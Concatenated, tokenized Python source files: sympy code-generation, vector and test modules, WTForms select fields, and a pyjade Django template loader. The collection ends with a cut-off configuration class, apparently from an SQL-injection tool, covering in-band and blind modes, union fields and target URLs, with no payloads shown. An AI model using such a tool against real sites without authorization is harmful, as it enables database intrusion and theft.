code_generator , tempdir , flags , verbose ) <EOL> helps = [ ] <EOL> for name_h , expr_h , args_h in helpers : <EOL> helps . append ( make_routine ( name_h , expr_h , args_h ) ) <EOL> for name_h , expr_h , args_h in helpers : <EOL> if expr . has ( expr_h ) : <EOL> name_h = binary_function ( name_h , expr_h , backend = '<STR_LIT>' ) <EOL> expr = expr . subs ( expr_h , name_h ( * args_h ) ) <EOL> try : <EOL> routine = make_routine ( '<STR_LIT>' , expr , args ) <EOL> except CodeGenArgumentListError as e : <EOL> new_args = [ ] <EOL> for missing in e . missing_args : <EOL> if not isinstance ( missing , OutputArgument ) : <EOL> raise <EOL> new_args . append ( missing . name ) <EOL> routine = make_routine ( '<STR_LIT>' , expr , args + new_args ) <EOL> return code_wrapper . wrap_code ( routine , helpers = helps ) <EOL> @ doctest_depends_on ( exe = ( '<STR_LIT>' , '<STR_LIT>' ) , modules = ( '<STR_LIT>' , ) ) <EOL> def binary_function ( symfunc , expr , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> binary = autowrap ( expr , ** kwargs ) <EOL> return implemented_function ( symfunc , binary ) <EOL> _ufunc_top = Template ( """<STR_LIT>""" ) <EOL> _ufunc_body = Template ( """<STR_LIT>""" ) <EOL> _ufunc_bottom = Template ( """<STR_LIT>""" ) <EOL> _ufunc_init_form = Template ( """<STR_LIT>""" ) <EOL> _ufunc_setup = Template ( """<STR_LIT>""" ) <EOL> class UfuncifyCodeWrapper ( CodeWrapper ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def command ( self ) : <EOL> command = [ sys . executable , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> return command <EOL> def _prepare_files ( self , routine ) : <EOL> codefilename = self . module_name + '<STR_LIT>' <EOL> with open ( codefilename , '<STR_LIT:w>' ) as f : <EOL> self . dump_c ( [ routine ] , f , self . filename ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as f : <EOL> self . dump_setup ( f ) <EOL> @ classmethod <EOL> def _get_wrapped_function ( cls , mod , name ) : <EOL> return getattr ( mod , name ) <EOL> def dump_setup ( self , f ) : <EOL> setup = _ufunc_setup . substitute ( module = self . module_name , <EOL> filename = self . filename ) <EOL> f . write ( setup ) <EOL> def dump_c ( self , routines , f , prefix ) : <EOL> """<STR_LIT>""" <EOL> functions = [ ] <EOL> function_creation = [ ] <EOL> ufunc_init = [ ] <EOL> module = self . module_name <EOL> include_file = "<STR_LIT>" . format ( prefix ) <EOL> top = _ufunc_top . substitute ( include_file = include_file , module = module ) <EOL> for r_index , routine in enumerate ( routines ) : <EOL> name = routine . name <EOL> py_in , py_out = self . _partition_args ( routine . arguments ) <EOL> n_in = len ( py_in ) <EOL> n_out = <NUM_LIT:1> <EOL> form = "<STR_LIT>" <EOL> arg_decs = [ form . format ( '<STR_LIT>' , i , i ) for i in range ( n_in ) ] <EOL> arg_decs . append ( form . format ( '<STR_LIT>' , <NUM_LIT:1> , n_in ) ) <EOL> declare_args = '<STR_LIT>' . join ( arg_decs ) <EOL> form = "<STR_LIT>" <EOL> step_decs = [ form . format ( '<STR_LIT>' , i , i ) for i in range ( n_in ) ] <EOL> step_decs . append ( form . format ( '<STR_LIT>' , <NUM_LIT:1> , n_in ) ) <EOL> declare_steps = '<STR_LIT>' . join ( step_decs ) <EOL> form = "<STR_LIT>" <EOL> call_args = '<STR_LIT:U+002CU+0020>' . join ( [ form . format ( a ) for a in range ( n_in ) ] ) <EOL> form = "<STR_LIT>" <EOL> step_incs = [ form . format ( '<STR_LIT>' , i ) for i in range ( n_in ) ] <EOL> step_incs . append ( form . format ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> step_increments = '<STR_LIT>' . join ( step_incs ) <EOL> n_types = n_in + n_out <EOL> types = "<STR_LIT:{>" + '<STR_LIT:U+002CU+0020>' . join ( [ "<STR_LIT>" ] * n_types ) + "<STR_LIT>" <EOL> docstring = '<STR_LIT>' <EOL> function_creation . append ( "<STR_LIT>" . format ( r_index ) ) <EOL> init_form = _ufunc_init_form . substitute ( module = module , <EOL> funcname = name , <EOL> docstring = docstring , <EOL> n_in = n_in , n_out = n_out , <EOL> ind = r_index ) <EOL> ufunc_init . append ( init_form ) <EOL> body = _ufunc_body . substitute ( module = module , funcname = name , <EOL> declare_args = declare_args , <EOL> declare_steps = declare_steps , <EOL> call_args = call_args , <EOL> step_increments = step_increments , <EOL> n_types = n_types , types = types ) <EOL> functions . append ( body ) <EOL> body = '<STR_LIT>' . join ( functions ) <EOL> ufunc_init = '<STR_LIT>' . join ( ufunc_init ) <EOL> function_creation = '<STR_LIT>' . join ( function_creation ) <EOL> bottom = _ufunc_bottom . substitute ( module = module , <EOL> ufunc_init = ufunc_init , <EOL> function_creation = function_creation ) <EOL> text = [ top , body , bottom ] <EOL> f . write ( '<STR_LIT>' . join ( text ) ) <EOL> def _partition_args ( self , args ) : <EOL> """<STR_LIT>""" <EOL> py_in = [ ] <EOL> py_out = [ ] <EOL> for arg in args : <EOL> if isinstance ( arg , OutputArgument ) : <EOL> if py_out : <EOL> msg = "<STR_LIT>" <EOL> raise ValueError ( msg ) <EOL> py_out . append ( arg ) <EOL> elif isinstance ( arg , InOutArgument ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> else : <EOL> py_in . append ( arg ) <EOL> return py_in , py_out <EOL> @ cacheit <EOL> @ doctest_depends_on ( exe = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , modules = ( '<STR_LIT>' , ) ) <EOL> def ufuncify ( args , expr , language = None , backend = '<STR_LIT>' , tempdir = None , <EOL> flags = None , verbose = False , helpers = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( args , Symbol ) : <EOL> args = ( args , ) <EOL> else : <EOL> args = tuple ( args ) <EOL> if language : <EOL> _validate_backend_language ( backend , language ) <EOL> else : <EOL> language = _infer_language ( backend ) <EOL> helpers = helpers if helpers else ( ) <EOL> flags = flags if flags else ( ) <EOL> if backend . upper ( ) == '<STR_LIT>' : <EOL> routine = make_routine ( '<STR_LIT>' , expr , args ) <EOL> helps = [ ] <EOL> for name , expr , args in helpers : <EOL> helps . append ( make_routine ( name , expr , args ) ) <EOL> code_wrapper = UfuncifyCodeWrapper ( CCodeGen ( "<STR_LIT>" ) , tempdir , <EOL> flags , verbose ) <EOL> return code_wrapper . wrap_code ( routine , helpers = helps ) <EOL> else : <EOL> y = IndexedBase ( Dummy ( ) ) <EOL> m = Dummy ( integer = True ) <EOL> i = Idx ( Dummy ( integer = True ) , m ) <EOL> f = implemented_function ( Dummy ( ) . name , Lambda ( args , expr ) ) <EOL> indexed_args = [ IndexedBase ( Dummy ( str ( a ) ) ) for a in args ] <EOL> args = [ y ] + indexed_args + [ m ] <EOL> args_with_indices = [ a [ i ] for a in indexed_args ] <EOL> return autowrap ( Eq ( y [ i ] , f ( * args_with_indices ) ) , language , backend , <EOL> tempdir , args , flags , verbose , helpers ) </s>
<s> from sympy . utilities . decorator import threaded , xthreaded <EOL> from sympy import Eq , Matrix <EOL> from sympy . abc import x , y <EOL> from sympy . core . decorators import wraps <EOL> def test_threaded ( ) : <EOL> @ threaded <EOL> def function ( expr , * args ) : <EOL> return <NUM_LIT:2> * expr + sum ( args ) <EOL> assert function ( Matrix ( [ [ x , y ] , [ <NUM_LIT:1> , x ] ] ) , <NUM_LIT:1> , <NUM_LIT:2> ) == Matrix ( [ [ <NUM_LIT:2> * x + <NUM_LIT:3> , <NUM_LIT:2> * y + <NUM_LIT:3> ] , [ <NUM_LIT:5> , <NUM_LIT:2> * x + <NUM_LIT:3> ] ] ) <EOL> assert function ( Eq ( x , y ) , <NUM_LIT:1> , <NUM_LIT:2> ) == Eq ( <NUM_LIT:2> * x + <NUM_LIT:3> , <NUM_LIT:2> * y + <NUM_LIT:3> ) <EOL> assert function ( [ x , y ] , <NUM_LIT:1> , <NUM_LIT:2> ) == [ <NUM_LIT:2> * x + <NUM_LIT:3> , <NUM_LIT:2> * y + <NUM_LIT:3> ] <EOL> assert function ( ( x , y ) , <NUM_LIT:1> , <NUM_LIT:2> ) == ( <NUM_LIT:2> * x + <NUM_LIT:3> , <NUM_LIT:2> * y + <NUM_LIT:3> ) <EOL> assert function ( { x , y } , <NUM_LIT:1> , <NUM_LIT:2> ) == { <NUM_LIT:2> * x + <NUM_LIT:3> , <NUM_LIT:2> * y + <NUM_LIT:3> } <EOL> @ threaded <EOL> def function ( expr , n ) : <EOL> return expr ** n <EOL> assert function ( x + y , <NUM_LIT:2> ) == x ** <NUM_LIT:2> + y ** <NUM_LIT:2> <EOL> assert function ( x , <NUM_LIT:2> ) == x ** <NUM_LIT:2> <EOL> def test_xthreaded ( ) : <EOL> @ xthreaded <EOL> def function ( expr , n ) : <EOL> return expr ** n <EOL> assert function ( x + y , <NUM_LIT:2> ) == ( x + y ) ** <NUM_LIT:2> <EOL> def test_wraps ( ) : <EOL> def my_func ( x ) : <EOL> """<STR_LIT>""" <EOL> my_func . is_my_func = True <EOL> new_my_func = threaded ( my_func ) <EOL> new_my_func = wraps ( my_func ) ( new_my_func ) <EOL> assert new_my_func . __name__ == '<STR_LIT>' <EOL> assert new_my_func . __doc__ == '<STR_LIT>' <EOL> assert hasattr ( new_my_func , '<STR_LIT>' ) <EOL> assert new_my_func . is_my_func is True </s>
<s> from sympy . core . assumptions import StdFactKB <EOL> from sympy . core import S , Pow , Symbol <EOL> from sympy . core . expr import AtomicExpr <EOL> from sympy . core . compatibility import range <EOL> from sympy import diff as df , sqrt , ImmutableMatrix as Matrix <EOL> from sympy . vector . coordsysrect import CoordSysCartesian <EOL> from sympy . vector . basisdependent import ( BasisDependent , BasisDependentAdd , <EOL> BasisDependentMul , BasisDependentZero ) <EOL> from sympy . vector . dyadic import BaseDyadic , Dyadic , DyadicAdd <EOL> from sympy . core . compatibility import u <EOL> class Vector ( BasisDependent ) : <EOL> """<STR_LIT>""" <EOL> is_Vector = True <EOL> _op_priority = <NUM_LIT> <EOL> @ property <EOL> def components ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _components <EOL> def magnitude ( self ) : <EOL> """<STR_LIT>""" <EOL> return sqrt ( self & self ) <EOL> def normalize ( self ) : <EOL> """<STR_LIT>""" <EOL> return self / self . magnitude ( ) <EOL> def dot ( self , other ) : <EOL> """<STR_LIT>""" <EOL> from sympy . vector . functions import express <EOL> if isinstance ( other , Dyadic ) : <EOL> if isinstance ( self , VectorZero ) : <EOL> return Vector . zero <EOL> outvec = Vector . zero <EOL> for k , v in other . components . items ( ) : <EOL> vect_dot = k . args [ <NUM_LIT:0> ] . dot ( self ) <EOL> outvec += vect_dot * v * k . args [ <NUM_LIT:1> ] <EOL> return outvec <EOL> from sympy . vector . deloperator import Del <EOL> if not isinstance ( other , Vector ) and not isinstance ( other , Del ) : <EOL> raise TypeError ( str ( other ) + "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> if isinstance ( other , Del ) : <EOL> def directional_derivative ( field ) : <EOL> field = express ( field , other . system , variables = True ) <EOL> out = self . dot ( other . _i ) * df ( field , other . _x ) <EOL> out += self . dot ( other . _j ) * df ( field , other . _y ) <EOL> out += self . dot ( other . _k ) * df ( field , other . _z ) <EOL> if out == <NUM_LIT:0> and isinstance ( field , Vector ) : <EOL> out = Vector . zero <EOL> return out <EOL> return directional_derivative <EOL> if isinstance ( self , VectorZero ) or isinstance ( other , VectorZero ) : <EOL> return S ( <NUM_LIT:0> ) <EOL> v1 = express ( self , other . _sys ) <EOL> v2 = express ( other , other . _sys ) <EOL> dotproduct = S ( <NUM_LIT:0> ) <EOL> for x in other . _sys . base_vectors ( ) : <EOL> dotproduct += ( v1 . components . get ( x , <NUM_LIT:0> ) * <EOL> v2 . components . get ( x , <NUM_LIT:0> ) ) <EOL> return dotproduct <EOL> def __and__ ( self , other ) : <EOL> return self . dot ( other ) <EOL> __and__ . __doc__ = dot . __doc__ <EOL> def cross ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , Dyadic ) : <EOL> if isinstance ( self , VectorZero ) : <EOL> return Dyadic . zero <EOL> outdyad = Dyadic . zero <EOL> for k , v in other . components . items ( ) : <EOL> cross_product = self . cross ( k . args [ <NUM_LIT:0> ] ) <EOL> outer = cross_product . outer ( k . args [ <NUM_LIT:1> ] ) <EOL> outdyad += v * outer <EOL> return outdyad <EOL> elif not isinstance ( other , Vector ) : <EOL> raise TypeError ( str ( other ) + "<STR_LIT>" ) <EOL> elif ( isinstance ( self , VectorZero ) or <EOL> isinstance ( other , VectorZero ) ) : <EOL> return Vector . zero <EOL> def _det ( mat ) : <EOL> """<STR_LIT>""" <EOL> return ( mat [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] * ( mat [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] * mat [ <NUM_LIT:2> ] [ <NUM_LIT:2> ] - mat [ <NUM_LIT:1> ] [ <NUM_LIT:2> ] * <EOL> mat [ <NUM_LIT:2> ] [ <NUM_LIT:1> ] ) + <EOL> mat [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] * ( mat [ <NUM_LIT:1> ] [ <NUM_LIT:2> ] * mat [ <NUM_LIT:2> ] [ <NUM_LIT:0> ] - mat [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] * <EOL> mat [ <NUM_LIT:2> ] [ <NUM_LIT:2> ] ) + <EOL> mat [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] * ( mat [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] * mat [ <NUM_LIT:2> ] [ <NUM_LIT:1> ] - mat [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] * <EOL> mat [ <NUM_LIT:2> ] [ <NUM_LIT:0> ] ) ) <EOL> outvec = Vector . zero <EOL> for system , vect in other . separate ( ) . items ( ) : <EOL> tempi = system . i <EOL> tempj = system . j <EOL> tempk = system . k <EOL> tempm = [ [ tempi , tempj , tempk ] , <EOL> [ self & tempi , self & tempj , self & tempk ] , <EOL> [ vect & tempi , vect & tempj , vect & tempk ] ] <EOL> outvec += _det ( tempm ) <EOL> return outvec <EOL> def __xor__ ( self , other ) : <EOL> return self . cross ( other ) <EOL> __xor__ . __doc__ = cross . __doc__ <EOL> def outer ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( other , Vector ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> elif ( isinstance ( self , VectorZero ) or <EOL> isinstance ( other , VectorZero ) ) : <EOL> return Dyadic . zero <EOL> args = [ ] <EOL> for k1 , v1 in self . components . items ( ) : <EOL> for k2 , v2 in other . components . items ( ) : <EOL> args . append ( ( v1 * v2 ) * BaseDyadic ( k1 , k2 ) ) <EOL> return DyadicAdd ( * args ) <EOL> def projection ( self , other , scalar = False ) : <EOL> """<STR_LIT>""" <EOL> if self . equals ( Vector . zero ) : <EOL> return S . zero if scalar else Vector . zero <EOL> if scalar : <EOL> return self . dot ( other ) / self . dot ( self ) <EOL> else : <EOL> return self . dot ( other ) / self . dot ( self ) * self <EOL> def __or__ ( self , other ) : <EOL> return self . outer ( other ) <EOL> __or__ . __doc__ = outer . __doc__ <EOL> def to_matrix ( self , system ) : <EOL> """<STR_LIT>""" <EOL> return Matrix ( [ self . dot ( unit_vec ) for unit_vec in <EOL> system . base_vectors ( ) ] ) <EOL> def separate ( self ) : <EOL> """<STR_LIT>""" <EOL> parts = { } <EOL> for vect , measure in self . components . items ( ) : <EOL> parts [ vect . system ] = ( parts . get ( vect . system , Vector . zero ) + <EOL> vect * measure ) <EOL> return parts <EOL> class BaseVector ( Vector , AtomicExpr ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , name , index , system , pretty_str , latex_str ) : <EOL> name = str ( name ) <EOL> pretty_str = str ( pretty_str ) <EOL> latex_str = str ( latex_str ) <EOL> if index not in range ( <NUM_LIT:0> , <NUM_LIT:3> ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if not isinstance ( system , CoordSysCartesian ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> obj = super ( BaseVector , cls ) . __new__ ( cls , Symbol ( name ) , S ( index ) , <EOL> system , Symbol ( pretty_str ) , <EOL> Symbol ( latex_str ) ) <EOL> obj . _base_instance = obj <EOL> obj . _components = { obj : S ( <NUM_LIT:1> ) } <EOL> obj . _measure_number = S ( <NUM_LIT:1> ) <EOL> obj . _name = name <EOL> obj . _pretty_form = u ( pretty_str ) <EOL> obj . _latex_form = latex_str <EOL> obj . _system = system <EOL> assumptions = { '<STR_LIT>' : True } <EOL> obj . _assumptions = StdFactKB ( assumptions ) <EOL> obj . _sys = system <EOL> return obj <EOL> @ property <EOL> def system ( self ) : <EOL> return self . _system <EOL> def __str__ ( self , printer = None ) : <EOL> return self . _name <EOL> @ property <EOL> def free_symbols ( self ) : <EOL> return { self } <EOL> __repr__ = __str__ <EOL> _sympystr = __str__ <EOL> class VectorAdd ( BasisDependentAdd , Vector ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , * args , ** options ) : <EOL> obj = BasisDependentAdd . __new__ ( cls , * args , ** options ) <EOL> return obj <EOL> def __str__ ( self , printer = None ) : <EOL> ret_str = '<STR_LIT>' <EOL> items = list ( self . separate ( ) . items ( ) ) <EOL> items . sort ( key = lambda x : x [ <NUM_LIT:0> ] . __str__ ( ) ) <EOL> for system , vect in items : <EOL> base_vects = system . base_vectors ( ) <EOL> for x in base_vects : <EOL> if x in vect . components : <EOL> temp_vect = self . components [ x ] * x <EOL> ret_str += temp_vect . __str__ ( printer ) + "<STR_LIT>" <EOL> return ret_str [ : - <NUM_LIT:3> ] <EOL> __repr__ = __str__ <EOL> _sympystr = __str__ <EOL> class VectorMul ( BasisDependentMul , Vector ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , * args , ** options ) : <EOL> obj = BasisDependentMul . __new__ ( cls , * args , ** options ) <EOL> return obj <EOL> @ property <EOL> def base_vector ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _base_instance <EOL> @ property <EOL> def measure_number ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _measure_number <EOL> class VectorZero ( BasisDependentZero , Vector ) : <EOL> """<STR_LIT>""" <EOL> _op_priority = <NUM_LIT> <EOL> _pretty_form = u'<STR_LIT:0>' <EOL> _latex_form = '<STR_LIT>' <EOL> def __new__ ( cls ) : <EOL> obj = BasisDependentZero . __new__ ( cls ) <EOL> return obj <EOL> def _vect_div ( one , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( one , Vector ) and isinstance ( other , Vector ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> elif isinstance ( one , Vector ) : <EOL> if other == S . Zero : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return VectorMul ( one , Pow ( other , S . NegativeOne ) ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> Vector . _expr_type = Vector <EOL> Vector . _mul_func = VectorMul <EOL> Vector . _add_func = VectorAdd <EOL> Vector . _zero_func = VectorZero <EOL> Vector . _base_func = BaseVector <EOL> Vector . _div_helper = _vect_div <EOL> Vector . zero = VectorZero ( ) </s>
<s> """<STR_LIT>""" <EOL> import operator <EOL> from wtforms import widgets <EOL> from wtforms . fields import SelectFieldBase , FieldList <EOL> from wtforms . validators import ValidationError <EOL> from wtforms . widgets import TextInput <EOL> __all__ = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> class QuerySelectField ( SelectFieldBase ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . Select ( ) <EOL> def __init__ ( self , label = None , validators = None , query_factory = None , <EOL> get_label = None , allow_blank = False , <EOL> blank_text = '<STR_LIT>' , ** kwargs ) : <EOL> super ( QuerySelectField , self ) . __init__ ( label , validators , ** kwargs ) <EOL> self . query_factory = query_factory <EOL> self . get_pk = lambda x : x . id <EOL> if get_label is None : <EOL> self . get_label = lambda x : x <EOL> elif isinstance ( get_label , ( str , basestring ) ) : <EOL> self . get_label = operator . attrgetter ( get_label ) <EOL> else : <EOL> self . get_label = get_label <EOL> self . allow_blank = allow_blank <EOL> self . blank_text = blank_text <EOL> self . query = None <EOL> self . _object_list = None <EOL> def _get_data ( self ) : <EOL> if self . _formdata is not None : <EOL> for pk , obj in self . _get_object_list ( ) : <EOL> if pk == self . _formdata : <EOL> self . _set_data ( obj ) <EOL> break <EOL> return self . _data <EOL> def _set_data ( self , data ) : <EOL> self . _data = data <EOL> self . _formdata = None <EOL> data = property ( _get_data , _set_data ) <EOL> def _get_object_list ( self ) : <EOL> if not self . query_factory : <EOL> return [ ] <EOL> self . query_factory . rewind ( ) <EOL> if self . _object_list is None : <EOL> query = self . query_factory <EOL> get_pk = self . get_pk <EOL> self . _object_list = list ( ( str ( get_pk ( obj ) ) , obj ) for obj in query ) <EOL> return self . _object_list <EOL> def iter_choices ( self ) : <EOL> if self . allow_blank : <EOL> yield ( '<STR_LIT>' , self . blank_text , self . data is None ) <EOL> for pk , obj in self . _get_object_list ( ) : <EOL> yield ( pk , self . get_label ( obj ) , obj == self . data ) <EOL> def process_formdata ( self , valuelist ) : <EOL> if valuelist : <EOL> if self . allow_blank and valuelist [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> self . data = None <EOL> else : <EOL> self . _data = None <EOL> self . _formdata = valuelist [ <NUM_LIT:0> ] <EOL> def pre_validate ( self , form ) : <EOL> if not self . allow_blank or self . data is not None : <EOL> for pk , obj in self . _get_object_list ( ) : <EOL> if self . data == obj : <EOL> break <EOL> else : <EOL> raise ValidationError ( self . gettext ( '<STR_LIT>' ) ) <EOL> class QuerySelectMultipleField ( QuerySelectField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . Select ( multiple = True ) <EOL> def __init__ ( self , label = None , validators = None , default = None , ** kwargs ) : <EOL> if default is None : <EOL> default = [ ] <EOL> super ( QuerySelectMultipleField , self ) . __init__ ( label , validators , <EOL> default = default , ** kwargs ) <EOL> self . _invalid_formdata = False <EOL> def _get_data ( self ) : <EOL> formdata = self . _formdata <EOL> if formdata is not None : <EOL> data = [ ] <EOL> for pk , obj in self . _get_object_list ( ) : <EOL> if not formdata : <EOL> break <EOL> elif pk in formdata : <EOL> formdata . remove ( pk ) <EOL> data . append ( obj ) <EOL> if formdata : <EOL> self . _invalid_formdata = True <EOL> self . _set_data ( data ) <EOL> return self . _data <EOL> def _set_data ( self , data ) : <EOL> self . _data = data <EOL> self . _formdata = None <EOL> data = property ( _get_data , _set_data ) <EOL> def iter_choices ( self ) : <EOL> for pk , obj in self . _get_object_list ( ) : <EOL> yield ( pk , self . get_label ( obj ) , obj in self . data ) <EOL> def process_formdata ( self , valuelist ) : <EOL> self . _formdata = set ( valuelist ) <EOL> def pre_validate ( self , form ) : <EOL> if self . _invalid_formdata : <EOL> raise ValidationError ( self . gettext ( '<STR_LIT>' ) ) <EOL> elif self . data : <EOL> obj_list = list ( x [ <NUM_LIT:1> ] for x in self . _get_object_list ( ) ) <EOL> for v in self . data : <EOL> if v not in obj_list : <EOL> raise ValidationError ( self . gettext ( '<STR_LIT>' ) ) <EOL> def get_pk_from_identity ( obj ) : <EOL> cls , key = identity_key ( instance = obj ) <EOL> return '<STR_LIT::>' . join ( str ( x ) for x in key ) <EOL> class ModelSelectField ( QuerySelectField ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , label = u'<STR_LIT>' , validators = None , model = None , ** kwargs ) : <EOL> super ( ModelSelectField , self ) . __init__ ( label , validators , <EOL> query_factory = model . objects , ** kwargs ) <EOL> class ModelSelectMultipleField ( QuerySelectMultipleField ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , label = u'<STR_LIT>' , validators = None , model = None , ** kwargs ) : <EOL> super ( ModelSelectMultipleField , self ) . __init__ ( label , validators , <EOL> query_factory = model . objects , ** kwargs ) <EOL> class ListField ( FieldList ) : <EOL> def new_generic ( self ) : <EOL> assert not self . max_entries or len ( self . entries ) < self . max_entries , '<STR_LIT>' <EOL> new_index = '<STR_LIT>' <EOL> name = '<STR_LIT>' % ( self . short_name , new_index ) <EOL> id = '<STR_LIT>' % ( self . id , new_index ) <EOL> field = self . unbound_field . bind ( form = None , name = name , <EOL> prefix = self . _prefix , id = id ) <EOL> field . process ( None , None ) <EOL> return field <EOL> class AutocompleteInput ( TextInput ) : <EOL> def __call__ ( self , field , ** kwargs ) : <EOL> autocomplete_value = kwargs . get ( '<STR_LIT:value>' , field . _value ( ) ) <EOL> kwargs [ '<STR_LIT:value>' ] = '<STR_LIT>' <EOL> kwargs [ '<STR_LIT>' ] = autocomplete_value <EOL> return super ( AutocompleteInput , self ) . __call__ ( field , ** kwargs ) </s>
<s> from __future__ import absolute_import <EOL> import hashlib <EOL> from django . template . base import Template <EOL> try : <EOL> from django . template . exceptions import TemplateDoesNotExist <EOL> except ImportError : <EOL> from django . template . base import TemplateDoesNotExist <EOL> from django . template . loader import BaseLoader <EOL> try : <EOL> from django . template . engine import Engine <EOL> except ImportError : <EOL> pass <EOL> import os <EOL> from django . conf import settings <EOL> from . compiler import Compiler <EOL> from pyjade . utils import process <EOL> try : <EOL> from django . template . loader import make_origin <EOL> except ImportError : <EOL> try : <EOL> from django . template import Origin <EOL> def make_origin ( display_name , loader , name , dirs ) : <EOL> return Origin ( <EOL> name = display_name , <EOL> template_name = name , <EOL> loader = loader , <EOL> ) <EOL> except ImportError : <EOL> make_origin = Engine . get_default ( ) . make_origin <EOL> class Loader ( BaseLoader ) : <EOL> is_usable = True <EOL> def __init__ ( self , loaders ) : <EOL> self . template_cache = { } <EOL> self . _loaders = loaders <EOL> self . _cached_loaders = [ ] <EOL> try : <EOL> from django . template . loader import find_template_loader as _find_template_loader <EOL> except : <EOL> _find_template_loader = Engine . get_default ( ) . find_template_loader <EOL> self . _find_template_loader = _find_template_loader <EOL> @ property <EOL> def loaders ( self ) : <EOL> if not self . _cached_loaders : <EOL> cached_loaders = [ ] <EOL> for loader in self . _loaders : <EOL> cached_loaders . append ( self . _find_template_loader ( loader ) ) <EOL> self . _cached_loaders = cached_loaders <EOL> return self . _cached_loaders <EOL> def find_template ( self , name , dirs = None ) : <EOL> for loader in self . loaders : <EOL> try : <EOL> template , display_name = loader ( name , dirs ) <EOL> return ( template , make_origin ( display_name , loader , <EOL> name , dirs ) ) <EOL> except TemplateDoesNotExist : <EOL> pass <EOL> raise TemplateDoesNotExist ( name ) <EOL> def load_template_source ( self , template_name , template_dirs = None ) : <EOL> for loader in self . loaders : <EOL> try : <EOL> return loader . load_template_source ( template_name , <EOL> template_dirs ) <EOL> except TemplateDoesNotExist : <EOL> pass <EOL> raise TemplateDoesNotExist ( template_name ) <EOL> def load_template ( self , template_name , template_dirs = None ) : <EOL> key = template_name <EOL> if template_dirs : <EOL> key = '<STR_LIT:->' . join ( [ template_name , hashlib . sha1 ( '<STR_LIT:|>' . join ( template_dirs ) ) . hexdigest ( ) ] ) <EOL> if settings . DEBUG or key not in self . template_cache : <EOL> if os . path . splitext ( template_name ) [ <NUM_LIT:1> ] in ( '<STR_LIT>' , ) : <EOL> try : <EOL> source , display_name = self . load_template_source ( template_name , template_dirs ) <EOL> source = process ( source , filename = template_name , compiler = Compiler ) <EOL> origin = make_origin ( display_name , self . load_template_source , template_name , template_dirs ) <EOL> template = Template ( source , origin , template_name ) <EOL> except NotImplementedError : <EOL> template , origin = self . find_template ( template_name , template_dirs ) <EOL> else : <EOL> template , origin = self . find_template ( template_name , template_dirs ) <EOL> if not hasattr ( template , '<STR_LIT>' ) : <EOL> try : <EOL> template = Template ( process ( source , filename = template_name , compiler = Compiler ) , origin , template_name ) <EOL> except ( TemplateDoesNotExist , UnboundLocalError ) : <EOL> return template , origin <EOL> self . template_cache [ key ] = template <EOL> return self . template_cache [ key ] , None <EOL> def reset ( self ) : <EOL> "<STR_LIT>" <EOL> self . template_cache . clear ( ) </s>
<s> """<STR_LIT>""" <EOL> from random import choice <EOL> class Context : <EOL> """<STR_LIT>""" <EOL> FIELD_STR = '<STR_LIT:string>' <EOL> FIELD_INT = '<STR_LIT:int>' <EOL> INBAND = '<STR_LIT>' <EOL> BLIND = '<STR_LIT>' <EOL> def __init__ ( self , method = INBAND , field_type = FIELD_STR , url = '<STR_LIT>' , <EOL> params = None , target = None , comment = '<STR_LIT>' , strdelim = "<STR_LIT:'>" , union_tag = None , <EOL> union_fields = ( ) , default = '<STR_LIT:0>' , union_target = - <NUM_LIT:1> , use_ssl = False , <EOL> smooth = False , headers = None , cookie = None , multithread = True , <EOL> truncate = False , encode_str = False ) : <EOL> '''<STR_LIT>''' <EOL> self . __method = method <EOL> self . __url = url <EOL> self . __params = params <EOL> self . __target = target <EOL> self . __comment = comment <EOL> self . __str_delim = strdelim <EOL> self . __default = default <EOL> self . __use_ssl = use_ssl <EOL> self . __encode_str = encode_str <EOL> self . __truncate = truncate <EOL> self . __field_type = field_type <EOL> self . __smooth = smooth <EOL> self . __headers = headers <EOL> self . __cookie = cookie <EOL> self . __multithread = multithread <EOL> self . __union_fields = union_fields <EOL> self . __union_target = union_target <EOL> if union_tag is not None : <EOL> self . __union_tag = union_tag <EOL> else : <EOL> self . __union_tag = '<STR_LIT>' . join ( [ choice ( '<STR_LIT>' ) for i in range ( <NUM_LIT:32> ) ] ) <EOL> def get_url ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __url <EOL> def set_url ( self , url ) : <EOL> """<STR_LIT>""" <EOL> self . __url = url <EOL> def set_field_type ( self , field_type ) : <EOL> """<STR_LIT>""" <EOL> self . __field_type = field_type <EOL> def get_field_type ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __field_type 